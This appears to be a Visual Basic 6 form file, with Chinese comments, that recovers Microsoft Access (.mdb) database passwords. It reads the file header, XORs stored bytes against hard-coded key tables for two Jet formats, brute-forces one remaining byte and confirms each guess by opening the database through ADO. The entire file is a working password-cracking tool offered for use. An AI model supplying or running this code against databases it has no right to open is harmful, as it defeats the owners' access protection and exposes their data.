form1.frm

主要是说明破解acess数据库的密码算法。语言用vb实现。执行编译的程序查看结果

VERSION 5.00
Begin VB.Form Form1 
   Caption         =   "Form1"
   ClientHeight    =   3195
   ClientLeft      =   60
   ClientTop       =   345
   ClientWidth     =   4680
   LinkTopic       =   "Form1"
   ScaleHeight     =   3195
   ScaleWidth      =   4680
   StartUpPosition =   3  '窗口缺省
   Begin VB.CommandButton Command1 
      Caption         =   "Command1"
      Height          =   1095
      Left            =   600
      TabIndex        =   0
      Top             =   840
      Width           =   2535
   End
End
Attribute VB_Name = "Form1"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
'ACCESS密码暴力破解.
'首先引用microsoft ActiveX Data Objects 2.0 Library

Private Function GetCrackPassword(FileName As String) As String   '解密
Dim sTemp           As String
Dim bytVer(2)       As Byte
Dim bytDB_ID        As Byte
Dim byt2            As Byte
Dim bytSecret(19)   As Byte
Dim bytEncrept(19)  As Byte
Dim l               As Long
Dim n               As Long
Dim lMax            As Long
Dim iFreeFile       As Integer

On Error GoTo acd
iFreeFile = FreeFile
Open FileName For Binary As #iFreeFile
Get #iFreeFile, &H15, bytDB_ID

If bytDB_ID = 1 Then
      lMax = 20
      bytSecret(0) = (&H49): bytSecret(1) = (&HEC): bytSecret(2) = (&H92): bytSecret(3) = (&H9C)
      bytSecret(4) = (&H9): bytSecret(5) = (&H28): bytSecret(6) = (&HDC): bytSecret(7) = (&H8A)
      bytSecret(8) = (&H9B): bytSecret(9) = (&H7B): bytSecret(10) = (&H3A): bytSecret(11) = (&HDF)
      bytSecret(12) = (&HB8): bytSecret(13) = (&H13): bytSecret(14) = (&H0): bytSecret(15) = (&HB1)
      bytSecret(16) = (&HFB): bytSecret(17) = (&H79): bytSecret(18) = (&H5D): bytSecret(19) = (&H7C)
ElseIf bytDB_ID = 0 Then
      lMax = 13
      bytSecret(0) = (&H86): bytSecret(1) = (&HFB): bytSecret(2) = (&HEC): bytSecret(3) = (&H37)
      bytSecret(4) = (&H5D): bytSecret(5) = (&H44): bytSecret(6) = (&H9C): bytSecret(7) = (&HFA)
      bytSecret(8) = (&HC6): bytSecret(9) = (&H5E): bytSecret(10) = (&H28): bytSecret(11) = (&HE6)
      bytSecret(12) = (&H13)
Else
      Close #iFreeFile
      MsgBox "出现未知错误!,请检查文件路径是否正确或文件是否正确!", , "出现错误"
      Exit Function
End If

For l = 1 To lMax
      Get #iFreeFile, &H43 + (l - 1) * (bytDB_ID + 1), bytEncrept(l - 1)
Next l
Close #iFreeFile
Me.Caption = "请等待....."
For n = -1 To 255
      sTemp = ""
      Debug.Print sTemp
      DoEvents
      If (n > -1) Or (bytDB_ID = 0) Then
          For l = 1 To lMax
              n = n * bytDB_ID
              If l Mod 2 = 1 Then
                  sTemp = sTemp & Chr(bytEncrept(l - 1) Xor bytSecret(l - 1) Xor n)
              Else
                  sTemp = sTemp & Chr(bytEncrept(l - 1) Xor bytSecret(l - 1))
              End If
          Next l

          sTemp = Replace(sTemp, Chr(0), "")
          If (bytDB_ID = 0) Then GoTo Endlabel
          If sTemp <> "" Then
              If OpenAccessDatabase(FileName, sTemp) Then
                   Exit For
              Else
                   sTemp = ""
              End If
          End If
      Else
          If OpenAccessDatabase(FileName, sTemp) Then
             MsgBox "此数据库没有设置密码!", , "提示"
              Exit For
        End If
      End If
Next n
Me.Caption = "完成"
Endlabel:
    GetCrackPassword = sTemp
    Exit Function
acd:
    MsgBox Err.Description, , "ERROR"
End Function

Private Function OpenAccessDatabase(FileName As String, dbPassword As String) As Boolean '能否打开数据库
Dim dbConnect As New ADODB.Connection
On Error GoTo acd

dbConnect.ConnectionString = "provider=microsoft.jet.oledb.4.0;data source=" & FileName & ";Persist Security Info=False;Jet OLEDB:Database Password=" & dbPassword  '打开数据库连接
dbConnect.Open

If dbConnect Is Nothing Then
    OpenAccessDatabase = False
Else
    OpenAccessDatabase = True
End If

Exit Function
acd:
OpenAccessDatabase = False
End Function

Private Sub Command1_Click()
MsgBox "密码是: " & GetCrackPassword(App.Path & "\RRRR.MDB")
End Sub


'具体酸法不知道。53行可能就是密码解密的步骤。且密码可以逐字符检测出来